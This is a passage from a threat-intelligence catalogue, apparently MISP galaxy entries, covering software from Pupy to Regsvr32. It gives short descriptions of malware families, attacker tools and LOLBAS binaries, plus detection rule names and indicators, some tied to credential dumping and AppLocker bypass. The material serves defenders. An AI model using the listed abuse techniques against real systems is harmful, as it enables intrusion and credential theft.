
Internal MISP references

UUID 0a8bedc2-b404-4a9a-b4f5-ff90ff8294be which can be used as unique global reference for Pupy in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS', 'Linux', 'Android', 'Windows']
software_attack_id S0192
source MITRE
type ['tool']
Related clusters

To see the related clusters, click here.

PuTTy

PuTTy is an open-source SSH and telnet client.[PuTTY Download Page]

Internal MISP references

UUID 313c78e9-488d-4fbc-a6e5-05c0df3cb8a4 which can be used as unique global reference for PuTTy in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5065
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee']
type ['tool']
Related clusters

To see the related clusters, click here.

pwdump

pwdump is a credential dumper. [Wikipedia pwdump]

Internal MISP references

UUID 77f629db-d971-49d8-8b73-c7c779b7de3e which can be used as unique global reference for pwdump in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0006
source MITRE
tags ['4d767e87-4cf6-438a-927a-43d2d0beaab7']
type ['tool']
Related clusters

To see the related clusters, click here.

PyDCrypt

PyDCrypt is malware written in Python designed to deliver DCSrv. It has been used by Moses Staff since at least September 2021, with each sample tailored for its intended victim organization.[Checkpoint MosesStaff Nov 2021]

Internal MISP references

UUID 51b2c56e-7d64-4e15-b1bd-45a980c9c44d which can be used as unique global reference for PyDCrypt in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1032
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

Pysa

Pysa is a ransomware that was first used in October 2018 and has been observed targeting high-value finance, government, and healthcare organizations in particular.[CERT-FR PYSA April 2020]

Internal MISP references

UUID e0d5ecce-eca0-4f01-afcc-0c8e92323016 which can be used as unique global reference for Pysa in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0583
source MITRE
tags ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']

QakBot

QakBot is a modular banking trojan that has been used primarily by financially-motivated actors since at least 2007. QakBot is continuously maintained and developed and has evolved from an information stealer into a delivery agent for ransomware, most notably ProLock and Egregor.[Trend Micro Qakbot December 2020][Red Canary Qbot][Kaspersky QakBot September 2021][ATT QakBot April 2021]

Internal MISP references

UUID 9050b418-5ffd-481a-a30d-f9059b0871ea which can be used as unique global reference for QakBot in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0650
source MITRE
tags ['e096f0dd-fa2c-4771-8270-128c97c09f5b', 'e809d252-12cc-494d-94f5-954c49eb87ce']
type ['malware']
Related clusters

To see the related clusters, click here.

QUADAGENT

QUADAGENT is a PowerShell backdoor used by OilRig. [Unit 42 QUADAGENT July 2018]

Internal MISP references

UUID 2bf68242-1dbd-405b-ac35-330eda887081 which can be used as unique global reference for QUADAGENT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0269
source MITRE
tags ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59']
type ['malware']
Related clusters

To see the related clusters, click here.

QuasarRAT

QuasarRAT is an open-source, remote access tool that has been publicly available on GitHub since at least 2014. QuasarRAT is developed in the C# language.[GitHub QuasarRAT][Volexity Patchwork June 2018]

Internal MISP references

UUID 4bab7c2b-5ec4-467e-8df4-f2e6996e136b which can be used as unique global reference for QuasarRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0262
source MITRE
tags ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59']
type ['tool']
Related clusters

To see the related clusters, click here.

QUIETCANARY

QUIETCANARY is a backdoor tool written in .NET that has been used since at least 2022 to gather and exfiltrate data from victim networks.[Mandiant Suspected Turla Campaign February 2023]

Internal MISP references

UUID 52d3515c-5184-5257-bf24-56adccb4cccd which can be used as unique global reference for QUIETCANARY in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1076
source MITRE
type ['malware']

QUIETEXIT

QUIETEXIT is a novel backdoor, based on the open-source Dropbear SSH client-server software, that has been used by APT29 since at least 2021. APT29 has deployed QUIETEXIT on opaque network appliances within a victim environment that typically do not support antivirus or endpoint detection and response tools.[Mandiant APT29 Eye Spy Email Nov 22]

Internal MISP references

UUID 947ab087-7550-577f-9ae9-5e82e9910610 which can be used as unique global reference for QUIETEXIT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Network']
software_attack_id S1084
source MITRE
tags ['33d35d5e-f0cf-4c66-9be3-a3ffe6610b1a']
type ['malware']
Related clusters

To see the related clusters, click here.

QuietSieve

QuietSieve is an information stealer that has been used by Gamaredon Group since at least 2021.[Microsoft Actinium February 2022]

Internal MISP references

UUID dcdb74c5-4445-49bd-9f9c-236a7ecc7904 which can be used as unique global reference for QuietSieve in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0686
source MITRE
tags ['4d767e87-4cf6-438a-927a-43d2d0beaab7']
type ['malware']
Related clusters

To see the related clusters, click here.

Quser

According to joint Cybersecurity Advisory AA23-250A (September 2023), Quser is "a valid program on Windows machines that displays information about user sessions on a Remote Desktop Session Host server".[U.S. CISA Zoho Exploits September 7 2023]

Internal MISP references

UUID 7b78eb31-f251-493b-8058-14a3452e8ccc which can be used as unique global reference for Quser in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5053
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', 'cd1b5d44-226e-4405-8985-800492cf2865']
type ['tool']
Related clusters

To see the related clusters, click here.

Raccoon Stealer 2.0

Raccoon Stealer is one of the most heavily used information and credential stealers ("infostealers") in recent years. The "2.0" version of Raccoon Stealer was observed in mid-2022, featuring new capabilities designed to improve its stealth.[Sekoia.io Raccoon Stealer June 28 2022] Raccoon Stealer is licensed as a service, and like many other modern infostealer families, the relatively low cost of a Raccoon Stealer subscription (around $75 for a week of access) contributes to the malware's popularity. Victim credentials acquired via Raccoon Stealer are often resold on illicit, automated marketplaces on the dark web.

More details on the shifting infostealer landscape, the rising threat posed by infostealers to large and small organizations, and defending against top infostealer TTPs can be found in the Tidal Cyber blog series: Part 1 (https://www.tidalcyber.com/blog/big-game-stealing-part-1-the-infostealer-landscape-rising-infostealer-threats-to-businesses-w), Part 2 (https://www.tidalcyber.com/blog/big-game-stealing-part-2-defenses-for-top-infostealer-techniques).

Internal MISP references

UUID 7046193b-96c2-462b-9ba1-ea39a938e8e9 which can be used as unique global reference for Raccoon Stealer 2.0 in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5070
source Tidal Cyber
tags ['15787198-6c8b-4f79-bf50-258d55072fee', '4d767e87-4cf6-438a-927a-43d2d0beaab7']
type ['malware']
Related clusters

To see the related clusters, click here.

Radmin

Radmin is a free remote desktop software application. It has been abused by cyber threat actors such as Akira ransomware operators to facilitate remote access into victim networks.[Sophos Akira May 9 2023]

Internal MISP references

UUID 33c0f985-3e1e-4901-bfee-d3c81bba0d71 which can be used as unique global reference for Radmin in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5281
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96']
type ['tool']
Related clusters

To see the related clusters, click here.

Ragnar Locker

Ragnar Locker is a ransomware that has been in use since at least December 2019.[Sophos Ragnar May 2020][Cynet Ragnar Apr 2020]

Internal MISP references

UUID d25f7acd-a995-4b8b-8ffe-ccc9703cdf5f which can be used as unique global reference for Ragnar Locker in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0481
source MITRE
tags ['cb5803f0-8ab4-4ada-8540-7758dfc126e2', '5e7433ad-a894-4489-93bc-41e90da90019', 'a2e000da-8181-4327-bacd-32013dbd3654', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']
Related clusters

To see the related clusters, click here.

Raindrop

Raindrop is a loader used by APT29 that was discovered on some victim machines during investigations related to the SolarWinds Compromise. It was discovered in January 2021 and was likely used since at least May 2020.[Symantec RAINDROP January 2021][Microsoft Deep Dive Solorigate January 2021]

Internal MISP references

UUID 80295aeb-59e3-4c5d-ac39-9879158f8d23 which can be used as unique global reference for Raindrop in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0565
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

RainyDay

RainyDay is a backdoor tool that has been used by Naikon since at least 2020.[Bitdefender Naikon April 2021]

Internal MISP references

UUID 42b775bd-0c1d-4ad3-8f7f-cbb0ba84e19e which can be used as unique global reference for RainyDay in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0629
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Ramsay

Ramsay is an information stealing malware framework designed to collect and exfiltrate sensitive documents, including from air-gapped systems. Researchers have identified overlaps between Ramsay and the Darkhotel-associated Retro malware.[Eset Ramsay May 2020][Antiy CERT Ramsay April 2020]

Internal MISP references

UUID dc307b3c-9bc5-4624-b0bc-4807fa1fc57b which can be used as unique global reference for Ramsay in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0458
source MITRE
type ['malware']

RARSTONE

RARSTONE is malware used by the Naikon group that has some characteristics similar to PlugX. [Aquino RARSTONE]

Internal MISP references

UUID a9c9fda8-c156-44f2-bc7e-1b696f3fbaa2 which can be used as unique global reference for RARSTONE in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0055
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Rasautou

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Windows Remote Access Dialer

Author: Tony Lambert

Paths: * C:\Windows\System32\rasautou.exe

Resources: * https://github.com/fireeye/DueDLLigence * https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html

Detection: * Sigma: win_rasautou_dll_execution.yml * IOC: rasautou.exe command line containing -d and -p[Rasautou.exe - LOLBAS Project]

Internal MISP references

UUID 8d34715e-1018-40fc-bf09-4eca69be830e which can be used as unique global reference for Rasautou in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5146
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Raspberry Robin

A highly active worm that spreads through removable media devices and abuses built-in Windows utilities after initial infection of the host. Raspberry Robin has evolved into a major malware delivery threat, with links to infections involving Cobalt Strike, SocGholish, Truebot, and ultimately ransomware.[Microsoft Security Raspberry Robin October 2022]

Delivers: Cobalt Strike[Microsoft Security Raspberry Robin October 2022], SocGholish[Microsoft Security Raspberry Robin October 2022], Truebot[Microsoft Security Raspberry Robin October 2022][U.S. CISA Increased Truebot Activity July 6 2023]

Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/win.raspberry_robin

Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/raspberryrobin/

PulseDive (IOCs): https://pulsedive.com/threat/Raspberry%20Robin

Internal MISP references

UUID dc0dbd15-0916-43c7-a3b9-6dc3ce0771be which can be used as unique global reference for Raspberry Robin in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5002
source Tidal Cyber
tags ['1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', 'e809d252-12cc-494d-94f5-954c49eb87ce']
type ['malware']

RATANKBA

RATANKBA is a remote controller tool used by Lazarus Group. RATANKBA has been used in attacks targeting financial institutions in Poland, Mexico, Uruguay, the United Kingdom, and Chile. It was also seen used against organizations related to telecommunications, management consulting, information technology, insurance, aviation, and education. RATANKBA has a graphical user interface to allow the attacker to issue jobs to perform on the infected machines. [Lazarus RATANKBA] [RATANKBA]

Internal MISP references

UUID 40466d7d-a107-46aa-a6fc-180e0eef2c6b which can be used as unique global reference for RATANKBA in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0241
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

RawDisk

RawDisk is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer's hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.[EldoS RawDisk ITpro][Novetta Blockbuster Destructive Malware]

Internal MISP references

UUID d86a562d-d235-4481-9a3f-273fa3ebe89a which can be used as unique global reference for RawDisk in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0364
source MITRE
type ['tool']
Related clusters

To see the related clusters, click here.

RawPOS

RawPOS is a point-of-sale (POS) malware family that searches for cardholder data on victims. It has been in use since at least 2008. [Kroll RawPOS Jan 2017] [TrendMicro RawPOS April 2015] [Visa RawPOS March 2015] FireEye divides RawPOS into three components: FIENDCRY, DUEBREW, and DRIFTWOOD. [Mandiant FIN5 GrrCON Oct 2016] [DarkReading FireEye FIN5 Oct 2015]

Internal MISP references

UUID 6ea1bf95-fed8-4b94-8071-aa19a3af5e34 which can be used as unique global reference for RawPOS in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0169
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Rclone

Rclone is a command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. Rclone has been used in a number of ransomware campaigns, including those associated with the Conti and DarkSide Ransomware-as-a-Service operations.[Rclone][Rclone Wars][Detecting Rclone][DarkSide Ransomware Gang][DFIR Conti Bazar Nov 2021]

Internal MISP references

UUID 1f3f15fa-1b4b-494d-abc8-c7f8a227b7b4 which can be used as unique global reference for Rclone in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS', 'Linux', 'Windows']
software_attack_id S1040
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'a40b7316-bef6-4186-9764-58ce6f033850', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '758c3085-2f79-40a8-ab95-f8a684737927', '2185ed93-7e1c-4553-9452-c8411b5dca93', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '8bf128ad-288b-41bc-904f-093f4fdde745', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

RCSession

RCSession is a backdoor written in C++ that has been in use since at least 2018 by Mustang Panda and by Threat Group-3390 (Type II Backdoor).[Secureworks BRONZE PRESIDENT December 2019][Trend Micro Iron Tiger April 2021][Trend Micro DRBControl February 2020]

Internal MISP references

UUID 38c4d208-fe38-4965-871c-709fa1479ba3 which can be used as unique global reference for RCSession in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0662
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

rcsi

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Non-Interactive command line interface included with Visual Studio.

Author: Oddvar Moe

Paths: * no default

Resources: * https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/

Detection:
* Sigma: proc_creation_win_csi_execution.yml
* Elastic: defense_evasion_unusual_process_network_connection.toml
* Elastic: defense_evasion_network_connection_from_windows_binary.toml
* BlockRule: proc_creation_win_csi_execution.yml[rcsi.exe - LOLBAS Project]

Internal MISP references

UUID 9a5cff11-6bad-407a-a53c-2562a56ac024 which can be used as unique global reference for rcsi in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5233
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

RDAT

RDAT is a backdoor used by the suspected Iranian threat group OilRig. RDAT was originally identified in 2017 and targeted companies in the telecommunications sector.[Unit42 RDAT July 2020]

Internal MISP references

UUID 567da30e-fd4d-4ec5-a308-bf08788f3bfb which can be used as unique global reference for RDAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0495
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

RDFSNIFFER

RDFSNIFFER is a module loaded by BOOSTWRITE which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.[FireEye FIN7 Oct 2019]

Internal MISP references

UUID ca4e973c-da15-46a9-8f3a-0b1560c9a783 which can be used as unique global reference for RDFSNIFFER in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0416
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

RDP Recognizer

RDP Recognizer is a tool that can be used to brute force RDP passwords and check for RDP vulnerabilities. U.S. authorities observed BianLian Ransomware Group actors downloading the tool during intrusions.[U.S. CISA BianLian Ransomware May 2023]

Internal MISP references

UUID 22d9f7be-7447-4cce-90f0-67a13d4b6a82 which can be used as unique global reference for RDP Recognizer in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5012
source Tidal Cyber
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '35e694ec-5133-46e3-b7e1-5831867c3b55', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

rdrleakdiag

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Microsoft Windows resource leak diagnostic tool

Author: John Dwyer

Paths: * c:\windows\system32\rdrleakdiag.exe * c:\Windows\SysWOW64\rdrleakdiag.exe

Resources:
* https://twitter.com/0gtweet/status/1299071304805560321?s=21
* https://www.pureid.io/dumping-abusing-windows-credentials-part-1/
* https://github.com/LOLBAS-Project/LOLBAS/issues/84

Detection:
* Sigma: proc_creation_win_rdrleakdiag_process_dumping.yml
* Elastic: https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html
* Elastic: credential_access_cmdline_dump_tool.toml[rdrleakdiag.exe - LOLBAS Project]

Internal MISP references

UUID 3b37c81a-9574-4ac3-a996-d4cfe1e3ddb1 which can be used as unique global reference for rdrleakdiag in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5147
source Tidal Cyber
tags ['9fbc403c-bd2e-458a-a202-a65b8201e973', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Reaver

Reaver is a malware family that has been in the wild since at least late 2016. Reporting indicates victims have primarily been associated with the "Five Poisons," which are movements the Chinese government considers dangerous. The type of malware is rare due to its final payload being in the form of Control Panel items.[Palo Alto Reaver Nov 2017]

Internal MISP references

UUID ca544771-d43e-4747-80e5-cf0f4a4836f3 which can be used as unique global reference for Reaver in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0172
source MITRE
type ['malware']

RedLeaves

RedLeaves is a malware family used by menuPass. The code overlaps with PlugX and may be based upon the open source tool Trochilus. [PWC Cloud Hopper Technical Annex April 2017] [FireEye APT10 April 2017]

Internal MISP references

UUID 5264c3ab-14e1-4ae1-854e-889ebde029b4 which can be used as unique global reference for RedLeaves in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0153
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Reg

Reg is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. [Microsoft Reg]

Utilities such as Reg are known to be used by persistent threats. [Windows Commands JPCERT]

Internal MISP references

UUID d796615c-fa3d-4afd-817a-1a3db8c73532 which can be used as unique global reference for Reg in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0075
source MITRE
tags ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ec4a7c87-051b-4b7d-8acc-03696fe2113e', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '303a3675-4855-4323-b042-95bb1d907cca', '8bf128ad-288b-41bc-904f-093f4fdde745', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

Regasm

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Part of .NET

Author: Oddvar Moe

Paths:
* C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
* C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
* C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
* C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe

Resources:
* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md

Detection:
* Sigma: proc_creation_win_lolbin_regasm.yml
* Elastic: execution_register_server_program_connecting_to_the_internet.toml
* Splunk: suspicious_regsvcs_regasm_activity.md
* Splunk: detect_regasm_with_network_connection.yml
* IOC: regasm.exe executing dll file[LOLBAS Regasm]

Internal MISP references

UUID 1e892f4b-5398-44ac-aeb4-2e50f70c5716 which can be used as unique global reference for Regasm in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5148
source Tidal Cyber
tags ['7d31d8f7-375b-4fb3-a631-51b42e58d95a', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

RegDuke

RegDuke is a first stage implant written in .NET and used by APT29 since at least 2017. RegDuke has been used to control a compromised machine when control of other implants on the machine was lost.[ESET Dukes October 2019]

Internal MISP references

UUID 52dc08d8-82cc-46dc-91ae-383193d72963 which can be used as unique global reference for RegDuke in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0511
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

Regedit

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used by Windows to manipulate registry

Author: Oddvar Moe

Paths: * C:\Windows\regedit.exe

Resources: * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

Detection:
* Sigma: proc_creation_win_regedit_import_keys_ads.yml
* IOC: regedit.exe reading and writing to alternate data stream
* IOC: regedit.exe should normally not be executed by end-users[Regedit.exe - LOLBAS Project]

Internal MISP references

UUID 16cc6ff2-8804-4863-aede-40c4376e0af3 which can be used as unique global reference for Regedit in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5149
source Tidal Cyber
tags ['36affa3d-c949-4e1b-8667-299490580dd5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Regin

Regin is a malware platform that has targeted victims in a range of industries, including telecom, government, and financial institutions. Some Regin timestamps date back to 2003. [Kaspersky Regin]

Internal MISP references

UUID e88bf527-bb9c-45c3-b86b-04a07dcd91fd which can be used as unique global reference for Regin in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0019
source MITRE
type ['malware']

Regini

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used to manipulate the registry

Author: Oddvar Moe

Paths: * C:\Windows\System32\regini.exe * C:\Windows\SysWOW64\regini.exe

Resources: * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

Detection:
* Sigma: proc_creation_win_regini_ads.yml
* Sigma: proc_creation_win_regini_execution.yml
* IOC: regini.exe reading from ADS[Regini.exe - LOLBAS Project]

Internal MISP references

UUID 92457f9e-c2e6-4d61-b927-0d8ff0f6d617 which can be used as unique global reference for Regini in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5150
source Tidal Cyber
tags ['288c6e19-cf6c-451a-aff3-547f371ff4ad', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Register-cimprovider

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used to register new wmi providers

Author: Oddvar Moe

Paths: * C:\Windows\System32\Register-cimprovider.exe * C:\Windows\SysWOW64\Register-cimprovider.exe

Resources: * https://twitter.com/PhilipTsukerman/status/992021361106268161

Detection: * Sigma: proc_creation_win_susp_register_cimprovider.yml * IOC: Register-cimprovider.exe execution and cmdline DLL load may be suspicious[Register-cimprovider.exe - LOLBAS Project]

Internal MISP references

UUID c80bac89-6b63-4860-9f66-260976a184e8 which can be used as unique global reference for Register-cimprovider in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5151
source Tidal Cyber
tags ['d379a1fb-1028-4986-ae6c-eb8cc068aa68', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Regsvcs

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies

Author: Oddvar Moe

Paths: * c:\Windows\Microsoft.NET\Framework\v\regsvcs.exe * c:\Windows\Microsoft.NET\Framework64\v\regsvcs.exe

Resources:
* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md

Detection:
* Sigma: proc_creation_win_lolbin_regasm.yml
* Elastic: execution_register_server_program_connecting_to_the_internet.toml
* Splunk: detect_regsvcs_with_network_connection.yml[LOLBAS Regsvcs]

Internal MISP references

UUID 271dd92b-76ee-4a00-ba41-343c32fc084e which can be used as unique global reference for Regsvcs in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5152
source Tidal Cyber
tags ['141e4dce-00be-4bd7-9f81-6202939f0359', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

Regsvr32

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Used by Windows to register dlls

Author: Oddvar Moe

Paths: * C:\Windows\System32\regsvr32.exe * C:\Windows\SysWOW64\regsvr32.exe

Resources:
* https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
* https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md

Detection:
